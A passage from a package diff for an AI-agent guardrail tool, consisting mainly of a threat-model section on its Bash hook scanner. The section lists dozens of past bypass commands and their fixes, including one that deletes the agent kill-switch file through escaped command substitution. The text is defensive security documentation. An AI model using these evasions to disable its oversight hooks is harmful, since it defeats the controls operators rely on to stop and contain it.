@bookedsolid/rea 0.22.0 → 0.23.1
- package/README.md +15 -0
- package/THREAT_MODEL.md +753 -0
- package/dist/audit/append.js +1 -1
- package/dist/cli/doctor.js +11 -12
- package/dist/cli/hook.d.ts +37 -3
- package/dist/cli/hook.js +167 -5
- package/dist/cli/init.js +14 -26
- package/dist/cli/install/canonical.js +18 -3
- package/dist/cli/install/commit-msg.js +1 -2
- package/dist/cli/install/copy.js +4 -13
- package/dist/cli/install/fs-safe.js +5 -16
- package/dist/cli/install/gitignore.js +1 -5
- package/dist/cli/install/pre-push.js +3 -8
- package/dist/cli/install/settings-merge.js +79 -16
- package/dist/cli/upgrade.js +14 -10
- package/dist/gateway/downstream.js +1 -2
- package/dist/gateway/live-state.js +3 -1
- package/dist/gateway/log.js +1 -3
- package/dist/gateway/middleware/audit.js +1 -1
- package/dist/gateway/middleware/injection.js +3 -9
- package/dist/gateway/middleware/policy.js +3 -1
- package/dist/gateway/middleware/redact.js +1 -1
- package/dist/gateway/observability/codex-telemetry.js +1 -2
- package/dist/gateway/reviewers/claude-self.js +10 -6
- package/dist/hooks/bash-scanner/blocked-scan.d.ts +26 -0
- package/dist/hooks/bash-scanner/blocked-scan.js +467 -0
- package/dist/hooks/bash-scanner/index.d.ts +41 -0
- package/dist/hooks/bash-scanner/index.js +62 -0
- package/dist/hooks/bash-scanner/parse-fail-closed.d.ts +31 -0
- package/dist/hooks/bash-scanner/parse-fail-closed.js +27 -0
- package/dist/hooks/bash-scanner/parser.d.ts +42 -0
- package/dist/hooks/bash-scanner/parser.js +92 -0
- package/dist/hooks/bash-scanner/protected-scan.d.ts +76 -0
- package/dist/hooks/bash-scanner/protected-scan.js +868 -0
- package/dist/hooks/bash-scanner/verdict.d.ts +80 -0
- package/dist/hooks/bash-scanner/verdict.js +49 -0
- package/dist/hooks/bash-scanner/walker.d.ts +165 -0
- package/dist/hooks/bash-scanner/walker.js +9087 -0
- package/dist/hooks/push-gate/base.js +2 -6
- package/dist/hooks/push-gate/codex-runner.js +3 -1
- package/dist/hooks/push-gate/index.js +9 -10
- package/dist/policy/loader.js +4 -1
- package/dist/registry/tofu-gate.js +2 -2
- package/hooks/blocked-paths-bash-gate.sh +142 -272
- package/hooks/protected-paths-bash-gate.sh +227 -511
- package/package.json +3 -2
- package/profiles/bst-internal-no-codex.yaml +1 -1
- package/profiles/bst-internal.yaml +1 -1
- package/profiles/client-engagement.yaml +1 -1
- package/profiles/lit-wc.yaml +1 -1
- package/profiles/minimal.yaml +1 -1
- package/profiles/open-source-no-codex.yaml +1 -1
- package/profiles/open-source.yaml +1 -1
- package/scripts/postinstall.mjs +1 -2
- package/scripts/run-vitest.mjs +117 -0
package/THREAT_MODEL.md
@@ -524,3 +524,756 @@ REA operates two independent layers. Bypassing one does not disable the other.
**Gateway layer** (runtime, `rea serve`): A middleware chain processes every proxied MCP tool call. Middleware enforces: audit, kill switch, policy/autonomy level, tier classification, blocked paths, rate limit, circuit breaker, prompt-injection classification (§5.21), secret redaction (pre and post), and result size cap. The gateway also supervises downstream child processes (§5.14), emits a `SESSION_BLOCKER` audit event on persistent failure (§5.15), and publishes a live per-downstream state snapshot to `.rea/serve.state.json` (§5.16) that `rea status` reads read-only. The `__rea__health` meta-tool short-circuits the chain for callability under HALT and runs a dedicated sanitizer on its response (§5.17).
|
|
525
525
|
|
|
526
526
|
Both layers fail closed: on read failure, parse error, unknown errno on HALT, regex timeout, or any unexpected condition, the default action is deny (or for redaction specifically: replace with a sentinel — the content never escapes unscanned).
|
|
527
|
+
|
|
528
|
+
---
|
|
529
|
+
|
|
530
|
+
## 8. Bash-tier scanner (parser-backed, 0.23.0+)
|
|
531
|
+
|
|
532
|
+
Two of the shipped hooks — `protected-paths-bash-gate.sh` and
|
|
533
|
+
`blocked-paths-bash-gate.sh` — are thin shims that forward stdin to
|
|
534
|
+
the `rea hook scan-bash` CLI subcommand. The CLI parses the Bash
|
|
535
|
+
command via `mvdan-sh@0.10.1`, walks the AST in
|
|
536
|
+
`src/hooks/bash-scanner/walker.ts`, and applies per-utility detectors
|
|
537
|
+
that produce a `DetectedWrite[]`. The scanner then matches each
|
|
538
|
+
detection's path against the protected-paths or blocked_paths policy
|
|
539
|
+
and emits a verdict JSON. The shim re-verifies the verdict shape via
|
|
540
|
+
`node -e` before honoring the exit code (defense against a tampered
|
|
541
|
+
`REA_NODE_CLI` that returns exit 0 with empty stdout).
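
The exit-code cross-check described above can be sketched roughly as follows. This is an illustration only, not the shim's actual `node -e` script: the `Verdict` type, the function names, the `"block"` value, and the mapping of exit code 0 to allow are all assumptions made for the example. Only the `{"verdict":"allow"}` shape appears elsewhere in this document.

```typescript
// Hypothetical verdict shape. Only {"verdict":"allow"} is shown in the text;
// the "block" value is an assumption for this sketch.
type Verdict = { verdict: "allow" | "block" };
type Decision = "allow" | "refuse";

// Parse stdout as JSON and confirm it has the expected shape.
function parseVerdict(stdout: string): Verdict | null {
  let parsed: unknown;
  try {
    parsed = JSON.parse(stdout);
  } catch {
    return null; // empty or malformed stdout
  }
  if (typeof parsed !== "object" || parsed === null) return null;
  const v = (parsed as { verdict?: unknown }).verdict;
  return v === "allow" || v === "block" ? { verdict: v } : null;
}

// Fail closed: allow only when the JSON says "allow" AND the exit code agrees.
// Assumes exit code 0 means allow and any other code means block.
function verifyVerdict(stdout: string, exitCode: number): Decision {
  const verdict = parseVerdict(stdout);
  if (verdict === null) return "refuse";
  const exitSaysAllow = exitCode === 0;
  const jsonSaysAllow = verdict.verdict === "allow";
  if (exitSaysAllow !== jsonSaysAllow) return "refuse";
  return jsonSaysAllow ? "allow" : "refuse";
}
```

Under these assumptions, a CLI that exits 0 with empty stdout is refused, because the empty string never parses into a verdict.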
|
|
542
|
+
|
|
543
|
+
### 8.1 Trust assumptions
|
|
544
|
+
|
|
545
|
+
The scanner trusts the following components. Each row names what we
|
|
546
|
+
trust, what would happen if the trust were violated, and what pins
|
|
547
|
+
the trust.
|
|
548
|
+
|
|
549
|
+
| Component | What we trust | If violated | Pinned by |
| --- | --- | --- | --- |
| `mvdan-sh@0.10.1` | Produces a faithful AST from any input bash accepts | Detector misses target on mis-shaped node | Pinned version, RedirOperator op-code snapshot tests, Class O exhaustiveness contract |
| Walker dispatch table | Enumerates every shape that produces a write | Novel utility silently allowed | Per-PR corpus fixture requirement; 18 corpus classes; convergence ladder |
| `fs.lstatSync` / `fs.readlinkSync` | Identify symlinks including dangling links | Symlink-out bypass class reopens | Codex round 1 F-2 closure + symlink corpus |
| `node` on PATH in the shim | Verdict-JSON verifier runs | Shim refuses on uncertainty (fail-closed) | Shim test for missing-node branch |
| Project-root realpath | `realpath(cli).startsWith(realpath(CLAUDE_PROJECT_DIR))` defends symlink-out | Forged CLI path inside `node_modules` defeats CLI-resolver | Codex round 5 F2 closure + corpus |
| OS realpath semantics | `node:fs.realpathSync` resolves symlinks consistently with the kernel; macOS `/var` ↔ `/private/var` aliasing handled via the `rea_resolved_relative_form` helper | Path-traversal escape | helix-021 closure + corpus |
| `@bookedsolid/rea` package install | `node_modules/@bookedsolid/rea/package.json#name === "@bookedsolid/rea"` AND realpath stays in project | Supply-chain compromise; see §8.3 | npm provenance; opt-in `policy.review.cli_sha256` (deferred to future minor) |
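
As a rough illustration of the project-root realpath row, the containment test can be written as a pure string check over paths that have already been resolved. The function names and example paths below are hypothetical, and the sketch assumes the caller has run `realpath` on both inputs. The trailing-separator form follows the `+ sep` variant quoted in §8.2.

```typescript
// Pure string check over paths the caller has ALREADY resolved with realpath.
// `sep` is the platform path separator ("/" on POSIX).
function isInsideProject(
  realCli: string,
  realProjectDir: string,
  sep: string = "/",
): boolean {
  // Normalise a trailing separator so "/work/app/" and "/work/app" behave the same.
  const root = realProjectDir.endsWith(sep) ? realProjectDir : realProjectDir + sep;
  return realCli.startsWith(root);
}

// Same check without the separator, shown only to illustrate the
// sibling-directory pitfall ("/work/app-evil" starts with "/work/app").
function naivePrefixCheck(realCli: string, realProjectDir: string): boolean {
  return realCli.startsWith(realProjectDir);
}
```

Appending the separator before the prefix test is what keeps a sibling directory such as `/work/app-evil` from passing as if it were inside `/work/app`.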
|
|
558
|
+
|
|
559
|
+
The scanner does NOT trust:
|
|
560
|
+
|
|
561
|
+
- The Bash command string itself — every input is parsed with a
|
|
562
|
+
hostile-input-tolerant parser and walked with a deny-by-default
|
|
563
|
+
visitor.
|
|
564
|
+
- `REA_NODE_CLI` / any environment variable nominating the CLI path
|
|
565
|
+
(codex round 1 F-3 + round 2 R2-3 — env-var hijack class dropped).
|
|
566
|
+
- The CLI exit code alone — the shim re-parses verdict JSON via
|
|
567
|
+
`node -e` and cross-checks exit code matches verdict (round 1 F-3).
|
|
568
|
+
- The visitor's per-`Cmd`-kind enumeration — replaced with `syntax.Walk`
|
|
569
|
+
in round-6 (round 6 closure: walker-dispatch field-omission is
|
|
570
|
+
structurally impossible).
|
|
571
|
+
- mvdan-sh's `syntax.Walk` to visit every Word-bearing field — Class O
|
|
572
|
+
contract test pins reach (round-7 closure).
|
|
573
|
+
- `unshellEscape` to handle every DQ-escape sequence — bash spec
|
|
574
|
+
enumerated and pinned by Class P corpus (round-8 closure).
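
To make the last item concrete, here is a minimal sketch of collapsing the escapes that bash treats as significant inside double quotes (`\$`, `` \` ``, `\"`, `\\`, and backslash-newline). It is not the project's `unshellEscape`; the name `collapseDqEscapes` and the single-regex approach are assumptions for illustration.

```typescript
// Collapse the escapes bash treats as significant inside double quotes:
// \$  \`  \"  \\  and backslash-newline (a line continuation, removed entirely).
// A backslash before any other character is left in place.
function collapseDqEscapes(payload: string): string {
  return payload.replace(/\\([$`"\\\n])/g, (_match: string, ch: string) =>
    ch === "\n" ? "" : ch,
  );
}
```

Because the replacement runs in a single left-to-right pass, an escaped backslash followed by `$` yields a literal backslash and an unescaped `$`, rather than being collapsed twice. Applied to the payload `echo \"\$(rm .rea/HALT)\"`, the sketch returns `echo "$(rm .rea/HALT)"`, which exposes the command substitution to a re-parse.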
|
|
575
|
+
|
|
576
|
+
### 8.2 Bypass classes structurally impossible
|
|
577
|
+
|
|
578
|
+
- **walker dispatch field-omission is structurally impossible**, and
|
|
579
|
+
**mvdan-sh `syntax.Walk` field gaps are pinned by a contract test**
|
|
580
|
+
(0.23.0 round-6 + round-7 layered closure).
|
|
581
|
+
|
|
582
|
+
Round 6 — our own dispatch. Pre-refactor `walkForWrites` dispatched
|
|
583
|
+
on AST `Cmd` kinds via an explicit `case` ladder
|
|
584
|
+
(`case 'WhileClause':`, `case 'ForClause':`, …) and manually
|
|
585
|
+
enumerated which fields each kind traversed. Any field NOT
|
|
586
|
+
enumerated in a case branch was silently dropped — that pattern
|
|
587
|
+
produced six rounds of P0 bypasses (rounds 1-5 patched detection
|
|
588
|
+
gaps; round 6 closed the structural class). Round 6 found two P0s
|
|
589
|
+
in the same class as round 5 (`WhileClause.Cond`,
|
|
590
|
+
`ForClause.CStyleLoop.{Init,Cond,Post}`) and the convergence ladder
|
|
591
|
+
34→14→9→8→5→2 demonstrated the walker would never reach 0 with
|
|
592
|
+
patches alone — it was structurally a denylist over AST shapes.
|
|
593
|
+
The new walker uses `mvdan-sh`'s built-in `syntax.Walk(node, visit)`
|
|
594
|
+
which traverses every Cmd-kind dispatch exhaustively from OUR side.
|
|
595
|
+
Our dispatch is preserved (per-utility cp/mv/sed/find/etc.), but the
|
|
596
|
+
TRAVERSAL is no longer a denylist of OUR shapes. A new `Cmd` type
|
|
597
|
+
added to mvdan-sh, or a new field on an existing type, reaches OUR
|
|
598
|
+
dispatcher when Walk descends into its inner Stmts / CallExprs /
|
|
599
|
+
BinaryCmds.
|
|
600
|
+
|
|
601
|
+
Round 7 — Walk's own field gaps. Codex round 7 (P0) flagged that
|
|
602
|
+
the round-6 framing "Walk visits every field" was an overclaim:
|
|
603
|
+
mvdan-sh@0.10.1's `syntax.Walk` itself has empirically-verified
|
|
604
|
+
field gaps. Specifically, `ParamExp.Slice.Offset` and
|
|
605
|
+
`ParamExp.Slice.Length` (Word nodes that can hold CmdSubst payloads)
|
|
606
|
+
are NOT visited. Pre-fix this defeated 17 round-7 PoCs including
|
|
607
|
+
`${X:$(rm)}`, `${X:0:$(rm)}`, `${arr[@]:$(rm)}`, `${@:$(rm)}` —
|
|
608
|
+
every paramexp-slice form bypassed every detector. That made
|
|
609
|
+
0.23.0 a regression vs 0.22.0 (whose bash regex caught
|
|
610
|
+
`${X:$(rm)}` directly). Round-7 closure layers on round-6:
|
|
611
|
+
|
|
612
|
+
1. Tactical fix: `walkForWrites` declares its visitor up front and
|
|
613
|
+
manually re-enters `syntax.Walk` on `ParamExp.Slice.Offset` /
|
|
614
|
+
`Slice.Length` whenever the visitor sees a ParamExp. The
|
|
615
|
+
re-entry uses the SAME visitor, so nested ParamExp.Slice forms
|
|
616
|
+
(e.g. `${X:${Y:$(rm)}}`) recurse correctly.
|
|
617
|
+
2. Structural pin: the **Class O exhaustiveness contract test**
|
|
618
|
+
(`__tests__/hooks/bash-scanner/walker-exhaustiveness.contract.test.ts`)
|
|
619
|
+
enumerates every named (node-type, field) Word-bearing position
|
|
620
|
+
mvdan-sh's parser populates and asserts the walker reaches each
|
|
621
|
+
one. If mvdan-sh@0.11.0+ adds a new node-with-Word-field that
|
|
622
|
+
Walk skips, the contract fails CI before runtime. The fix in
|
|
623
|
+
that case is always a one-line manual recursion in the visit
|
|
624
|
+
callback (same pattern as `recurseParamExpSlice`).
|
|
625
|
+
|
|
626
|
+
Combined: walker-dispatch field-omission bugs in OUR code are
|
|
627
|
+
structurally impossible (Walk-based traversal). Walk's own field
|
|
628
|
+
gaps are pinned by Class O. New mvdan-sh versions cannot silently
|
|
629
|
+
introduce new bypass classes — they fail the contract first.
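
The round-7 re-entry pattern can be illustrated with a toy model. Everything below is hypothetical: the `Node` type is a simplified stand-in rather than the mvdan-sh AST, and `libraryWalk` only imitates a walker that skips slice fields. The point of the sketch is that re-entering the walker with the same visitor lets nested slices recurse.

```typescript
// Toy AST, NOT the mvdan-sh node types. All names here are hypothetical.
type Node =
  | { kind: "Lit"; value: string }
  | { kind: "Word"; parts: Node[] }
  | { kind: "CmdSubst"; stmts: Node[] }
  | { kind: "CallExpr"; args: Node[] }
  | { kind: "ParamExp"; name: string; slice?: { offset?: Node; length?: Node } };

type Visit = (n: Node) => void;

// Stand-in for a library walker with a gap: it never descends into ParamExp.slice.
function libraryWalk(node: Node, visit: Visit): void {
  visit(node);
  switch (node.kind) {
    case "Word":
      node.parts.forEach((p) => libraryWalk(p, visit));
      break;
    case "CmdSubst":
      node.stmts.forEach((s) => libraryWalk(s, visit));
      break;
    case "CallExpr":
      node.args.forEach((a) => libraryWalk(a, visit));
      break;
    default:
      break; // Lit has no children; ParamExp.slice is skipped (the gap)
  }
}

// Count CmdSubst nodes. With `reenterSlices`, the visitor re-enters the walker
// on slice fields using the SAME visitor, so nested slices recurse.
function countCmdSubsts(root: Node, reenterSlices: boolean): number {
  let count = 0;
  const visit: Visit = (n) => {
    if (n.kind === "CmdSubst") count += 1;
    if (reenterSlices && n.kind === "ParamExp" && n.slice) {
      if (n.slice.offset) libraryWalk(n.slice.offset, visit);
      if (n.slice.length) libraryWalk(n.slice.length, visit);
    }
  };
  libraryWalk(root, visit);
  return count;
}

// ${X:${Y:$(rm)}} modelled in the toy AST.
const rmCall: Node = {
  kind: "CallExpr",
  args: [{ kind: "Word", parts: [{ kind: "Lit", value: "rm" }] }],
};
const inner: Node = {
  kind: "ParamExp",
  name: "Y",
  slice: { offset: { kind: "Word", parts: [{ kind: "CmdSubst", stmts: [rmCall] }] } },
};
const nested: Node = {
  kind: "ParamExp",
  name: "X",
  slice: { offset: { kind: "Word", parts: [inner] } },
};
```

In this model, `countCmdSubsts(nested, false)` finds nothing because the walker never reaches the slice, while `countCmdSubsts(nested, true)` reaches the command substitution two slice levels down.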
|
|
630
|
+
- segment-splitter mis-detection (helix-014/015/016) — there is no
|
|
631
|
+
segmenter to bypass.
|
|
632
|
+
- shell-redirect ordering vs argv ordering ambiguity — the parser
|
|
633
|
+
attaches `Redirs` to the right `Stmt`, including FuncDecl Body
|
|
634
|
+
Stmts (codex round 1 F-1).
|
|
635
|
+
- nested-shell payload bypass (helix-017 #2 / helix-022 #3) —
|
|
636
|
+
`bash -c PAYLOAD` re-parses the payload up to a depth cap of 8.
|
|
637
|
+
- `find -exec bash -c` re-wrap (codex round 1 F-4) — inner argv
|
|
638
|
+
routes through `detectNestedShell` for re-parse.
|
|
639
|
+
- combined flag-cluster bypass (`bash -ic`, `node -pe`, `perl -E`,
|
|
640
|
+
codex round 1 F-13/F-8) — the eval-flag scanner accepts any
|
|
641
|
+
short-flag cluster containing the eval char.
|
|
642
|
+
- backslash-escape bypass (codex round 1 F-15) — normalize strips
|
|
643
|
+
bash's runtime backslash collapse.
|
|
644
|
+
- dangling-symlink bypass (codex round 1 F-2) — `lstat`+`readlink`
|
|
645
|
+
resolves the link manually.
|
|
646
|
+
- REA_NODE_CLI hijack (codex round 1 F-3, codex round 2 R2-3) — env
|
|
647
|
+
var dropped entirely. The 4-tier resolver was further narrowed in
|
|
648
|
+
codex round 4 Finding 2: tiers 1 (`command -v rea` PATH lookup) and
|
|
649
|
+
2 (`node_modules/.bin/rea` symlink) were DROPPED because both are
|
|
650
|
+
workspace-attacker-controllable. The shim now uses a 2-tier sandboxed
|
|
651
|
+
resolver (`node_modules/@bookedsolid/rea/dist/cli/index.js` or
|
|
652
|
+
`dist/cli/index.js`). Workspace-bin attacker hijack via fake `rea`
|
|
653
|
+
binary at `node_modules/.bin/rea` is closed. The structural-impossibility
|
|
654
|
+
claim is bounded — see §8.3 for the supply-chain residual.
|
|
655
|
+
- symlink-out-of-project sandbox bypass (codex round 5 F2 — P0) — pre-fix
|
|
656
|
+
the realpath check only walked up looking for a `package.json` with
|
|
657
|
+
`name === "@bookedsolid/rea"`. An attacker who could write a symlink
|
|
658
|
+
at `node_modules/@bookedsolid/rea` pointing to `/tmp/sym-attacker/`
|
|
659
|
+
containing a forged `package.json` + a forged `dist/cli/index.js` that
|
|
660
|
+
exits 0 with `{"verdict":"allow"}` defeated the sandbox. Fix: PRIMARY
|
|
661
|
+
check is `realpath(cli).startsWith(realpath(CLAUDE_PROJECT_DIR) + sep)`;
|
|
662
|
+
any escape-out-of-project realpath refuses. The pkg.json walk-up
|
|
663
|
+
remains as the SECONDARY check guarding intra-project hijacks.
|
|
664
|
+
- assignment-side cmdsubst silent bypass (codex round 5 F1 — P0) —
|
|
665
|
+
`FOO=$(rm -rf .rea)`, `X=\`rm -rf .rea\``, `export FOO=$(rm)`,
|
|
666
|
+
`readonly X=$(rm)`, `local`/`declare`/`typeset`, `ARR=( $(rm) )`,
|
|
667
|
+
`[[ -n $(rm) ]]`, `case $(rm) in *) ;; esac`, `cat <<< $(rm)`,
|
|
668
|
+
`read X < <(rm)`, `(( $(rm | wc -l) ))`, `for x in $(rm)`. Pre-fix the
|
|
669
|
+
walker short-circuited at `args.length === 0` and ignored
|
|
670
|
+
`CallExpr.Assigns`; the AST cases `DeclClause`, `TestClause`,
|
|
671
|
+
`ArithmCmd`, `LetClause`, `SelectClause` and `CaseClause.Word` were
|
|
672
|
+
dropped at the walkCmd default. Stmt.Redirs's Word also wasn't walked
|
|
673
|
+
for embedded CmdSubst on read ops (here-string `<<<` 0x3f, procsubst-
|
|
674
|
+
on-stdin `< <(...)` 0x38). Fix: new `walkAssignsForSubstNodes` walks
|
|
675
|
+
every Assign.Value / Assign.Array.Elems[*].Value / Assign.Index for
|
|
676
|
+
embedded CmdSubst/ProcSubst/ArithmExp; new `walkTestExpr` recurses
|
|
677
|
+
through UnaryTest/BinaryTest/ParenTest leaves; walkCmd cases added for
|
|
678
|
+
every dropped clause type; extractStmtRedirects walks the Word for
|
|
679
|
+
cmdsubst regardless of operator.
|
|
680
|
+
- mixed-quote interpreter shell-out (codex round 5 F3 — P1) — pre-fix
|
|
681
|
+
the per-language `*_SHELL_OUT_RE` patterns used `["']([^"']+)["']` for
|
|
682
|
+
the inner-cmd capture, which truncated bodies whose source contained
|
|
683
|
+
the alternate quote (e.g. `os.system('rm "x"')` captured `rm `). Fix:
|
|
684
|
+
quote-aware variants `(["'])((?:(?!\1)[^\\]|\\.)+)\1` for python /
|
|
685
|
+
ruby / node / perl, plus a fail-closed shell-out fallback that emits a
|
|
686
|
+
dynamic detection when the payload contains a shell-out API token but
|
|
687
|
+
no shell-out regex extracted a clean payload.
|
|
688
|
+
- chained-interpreter multi-level escape bypass (codex round 5 F4 — P1)
|
|
689
|
+
— pre-fix `python -c "import os; os.system('node -e \"require(\\\"fs
|
|
690
|
+
\\\").rmSync(\\\".rea\\\", ...)\"')"` allowed because each layer
|
|
691
|
+
accumulates a `\\\"` shell-escape level and the per-language path-
|
|
692
|
+
quote regex rejects `(\\"` after the call paren. Fix: when a shell-
|
|
693
|
+
out body itself contains a known interpreter binary head followed by
|
|
694
|
+
an eval flag (`-c`/`-e`/`--eval`/`-pe`/`-ic`), emit a dynamic
|
|
695
|
+
detection (`looksLikeChainedInterpreter`). Refuse on uncertainty.
|
|
696
|
+
- non-string `tool_input.command` (codex round 1 F-31) — refused at
|
|
697
|
+
CLI input parse.
|
|
698
|
+
- absolute / relative-path command head (codex round 2 R2-14) —
|
|
699
|
+
basename-normalized before dispatcher switch; `/usr/bin/bash`,
|
|
700
|
+
`./sed`, `/usr/bin/env bash` all dispatch identically to the
|
|
701
|
+
bare-name form.
|
|
702
|
+
- decoupled-variable interpreter writes (codex round 2 R2-1) —
|
|
703
|
+
flat-scan over the payload: write API + any string-construction
|
|
704
|
+
primitive → dynamic detection.
|
|
705
|
+
- symlink cycles / deep chains (codex round 2 R2-2) — visited-set +
|
|
706
|
+
depth cap (32); cycle/cap returns sentinel that maps to "refuse on
|
|
707
|
+
uncertainty".
|
|
708
|
+
- joined `-t<DIR>` form (codex round 2 R2-4) — cp/mv/install/ln all
|
|
709
|
+
recognize the no-space form.
|
|
710
|
+
- tar `-C DIR`, rsync DEST, curl `-o`, wget `-O`, shred FILE,
|
|
711
|
+
eval payload, git checkout/restore/reset path (codex round 2 R2-7
|
|
712
|
+
through R2-13) — each utility now has a dedicated dispatcher.
|
|
713
|
+
- heredoc-into-shell (codex round 2 R2-12) — `bash <<EOF\n…\nEOF`
|
|
714
|
+
re-parses the heredoc body and walks the inner AST.
|
|
715
|
+
- eval re-parse (codex round 2 R2-13) — argv concat → re-parse →
|
|
716
|
+
walk; refuse on dynamic argv or parse failure.
|
|
717
|
+
- eval ordering with cmdsubst (codex round 3 Finding 1 — P0) —
|
|
718
|
+
`eval $(cmd)` no longer slips through the empty-inner short-circuit;
|
|
719
|
+
any-dynamic-argv emits a dynamic detection.
|
|
720
|
+
- pipe-into-bare-shell (codex round 3 Finding 2 — P1) — `cmd | bash`
|
|
721
|
+
with no `-c` is refuse-on-uncertainty.
|
|
722
|
+
- tar cluster `-xzfC` (codex round 3 Finding 3 — P1) — value-bearing
|
|
723
|
+
cluster chars consume subsequent argv tokens correctly.
|
|
724
|
+
- git top-level value-bearing flags (codex round 3 Finding 4 — P1) —
|
|
725
|
+
`-C`, `-c`, `--git-dir`, `--work-tree`, etc. are walked past before
|
|
726
|
+
identifying the subcommand.
|
|
727
|
+
- python shell-out shapes (codex round 3 Finding 5 — P1) —
|
|
728
|
+
`subprocess.* shell=True` and `subprocess.run(..., stdout=open())`
|
|
729
|
+
re-parse the inner shell.
|
|
730
|
+
- recursive directory delete bypass (codex round 4 Finding 1 — P0) —
|
|
731
|
+
`rm -rf .rea`, `rmdir .rea`, `find .rea -delete`, `shutil.rmtree(...)`,
|
|
732
|
+
`fs.rmSync(..., {recursive:true})`, `FileUtils.rm_rf(...)` etc. all
|
|
733
|
+
flag isDestructive on emit; the matcher's protected-ancestry path
|
|
734
|
+
treats writes against an ancestor directory as hits on every protected
|
|
735
|
+
pattern under it. Structurally closed: `PROTECTED_DIR_ANCESTORS` was
|
|
736
|
+
added to the corpus generator so the cross-product produces directory-
|
|
737
|
+
shaped destructive fixtures, eliminating the structural gap that
|
|
738
|
+
prevented detection.
|
|
739
|
+
- mv source-side bypass (codex round 4 Finding 3 — P1) — `mv` source
|
|
740
|
+
positionals are emitted as destructive writes too (mv removes content
|
|
741
|
+
at the source).
|
|
742
|
+
- find -delete unmodeled (codex round 4 Finding 4 — P1) — seed paths
|
|
743
|
+
are emitted as destructive write targets; with `-name PREDICATE`
|
|
744
|
+
present, the seed is emitted as dynamic+destructive (refuse on
|
|
745
|
+
uncertainty).
|
|
746
|
+
- interpreter shell-out breadth (codex round 4 Finding 5 — P1) — perl
|
|
747
|
+
exec/open-pipe, ruby Open3 / IO.popen, node spawn-with-bash-c, python
|
|
748
|
+
pty.spawn, opaque-spawn APIs (os.spawnv* / os.execv*) all detected
|
|
749
|
+
with re-parse-or-refuse.
|
|
750
|
+
- pathlib & File-class destructive APIs (codex round 4 Finding 6 — P1)
|
|
751
|
+
— Path(...).touch / .unlink / .rmdir / .rename, File.delete /
|
|
752
|
+
File.unlink / File.rename, ruby `open(F, 'w')` (bare), perl unlink /
|
|
753
|
+
rename all caught with isDestructive plumbed through where the API
|
|
754
|
+
semantic is removal.
|
|
755
|
+
- misc utility writes (codex round 4 Finding 7 — P1) — `patch`, `sort
|
|
756
|
+
-o`, `shuf -o`, `gpg --output`, `split <PREFIX>`, `trap "cmd" SIGNAL`
|
|
757
|
+
(re-parse trap command), `git config --file` all detected.
|
|
758
|
+
- procsubst-feeding-bash (codex round 4 Finding 7 — P1) — `bash <(cmd)`,
|
|
759
|
+
`bash 0< <(cmd)`, `bash <<< "cmd"` all emit dynamic detections; the
|
|
760
|
+
shell reads the FIFO/here-string as a script we cannot statically
|
|
761
|
+
resolve.
|
|
762
|
+
- nested-shell DQ-escape parity (codex round 8 P0) — `unshellEscape`
|
|
763
|
+
pre-fix collapsed only `\"` and `\'` from DQ payloads. Bash spec
|
|
764
|
+
collapses 5 DQ-significant escape sequences (`\$`, `` \` ``, `\"`,
|
|
765
|
+
`\\`, `\<newline>`). Pre-fix `bash -c "echo \"\$(rm .rea/HALT)\""`
|
|
766
|
+
was a verified end-to-end exploit: the real shell collapsed `\$` →
|
|
767
|
+
`$`, evaluated the CmdSubst, and deleted HALT, while the walker's
|
|
768
|
+
re-parse saw `\$` as a literal `$` (no CmdSubst child) and ALLOWED.
|
|
769
|
+
Fix: widened `unshellEscape`'s replace class to all five DQ-significant
|
|
770
|
+
escape characters. Class P corpus (≥560 fixtures across 5 shells × 16
|
|
771
|
+
DQ-escape shapes × 7 protected targets, plus 8 negatives) pins the
|
|
772
|
+
closure. Class O contract (round-7) was simultaneously tightened —
|
|
773
|
+
the lenient `|| w.dynamic` acceptance was replaced with opt-in
|
|
774
|
+
`acceptDynamic` per row, so contract-test passes can no longer mask
|
|
775
|
+
walker gaps via unrelated `nested_shell_inner` dynamic emits.
|
|
776
|
+
- wrapper-shell-exec class (codex round 9 F1 + round 10 P1) —
|
|
777
|
+
`<wrapper> <shell> -c PAYLOAD` shape where the wrapper transparently
|
|
778
|
+
forks/execs the next argv as the "real" command (`nice`, `timeout`,
|
|
779
|
+
`chronic`, `parallel`, `watch`, `dbus-launch`, ... and unbounded
|
|
780
|
+
future similar wrappers). Pre-round-9 `stripEnvAndModifiers` ignored
|
|
781
|
+
these wrappers, so the head-dispatch saw the wrapper name and missed
|
|
782
|
+
the inner `<shell> -c PAYLOAD`. Round 9 enumerated 21 wrappers; round
|
|
783
|
+
10 surfaced 5 more — clear evidence the enumeration approach was
|
|
784
|
+
unbounded. Round-10 closure is **structural**: a new
|
|
785
|
+
`detectWrappedNestedShell` pass runs in `walkCallExpr`'s `default:`
|
|
786
|
+
case (head not in dispatcher's allow-list) and detects the bypass
|
|
787
|
+
shape `<UNRECOGNIZED-HEAD> [...flags...] <KNOWN-SHELL> -c PAYLOAD`
|
|
788
|
+
REGARDLESS of wrapper identity. It synthesizes a `[shell, -c, PAYLOAD,
|
|
789
|
+
...]` slice and re-dispatches through `detectNestedShell`. False-
|
|
790
|
+
positive guards (a) skip when head is an introspection / output
|
|
791
|
+
utility (`echo`, `printf`, `man`, `which`, ...) and (b) skip when
|
|
792
|
+
argv[1] is itself an introspection head — covers
|
|
793
|
+
`<wrapper> echo bash` shapes. Three-token lookahead window between
|
|
794
|
+
shell positional and `-c` flag bounds false-positive risk. Bare-
|
|
795
|
+
shell-without-`-c` form refuses on uncertainty (stdin read).
|
|
796
|
+
Closes the bug class — every future unknown wrapper that
|
|
797
|
+
fork/execs a shell is caught without enumeration. Round 10 also
|
|
798
|
+
added explicit enumerations for `chronic`/`dbus-launch`/`watch`/
|
|
799
|
+
`script -c`/`parallel ::: ` for clean dispatch (no
|
|
800
|
+
refuse-on-uncertainty banner). Class S (233 wrapper-extension
|
|
801
|
+
positives + 38 negatives) and Class T (314 synthetic-wrapper
|
|
802
|
+
structural-guard positives + 29 false-positive-guard negatives)
|
|
803
|
+
pin the closure.
|
|
804
|
+
- find-exec placeholder, git history-rewrite seams, archive
|
|
805
|
+
extraction, parallel-stdin, more wrappers, php (codex round 11
|
|
806
|
+
F11-1..F11-7) — seven INDEPENDENT classes against the round-10
|
|
807
|
+
wrapper closure. None were variants of the wrapper family;
|
|
808
|
+
each landed in a different parser seam. (a) `find . -name HALT
|
|
809
|
+
-exec rm {} \;` — `{}` is a placeholder substituted at runtime
|
|
810
|
+
by find against the live filesystem; static analysis cannot
|
|
811
|
+
resolve which paths it expands to. Round-11 fix: synthetic
|
|
812
|
+
`find_exec_placeholder_unresolvable` dynamic detection emitted
|
|
813
|
+
whenever inner argv has `{}` AND the inner head is not in a
|
|
814
|
+
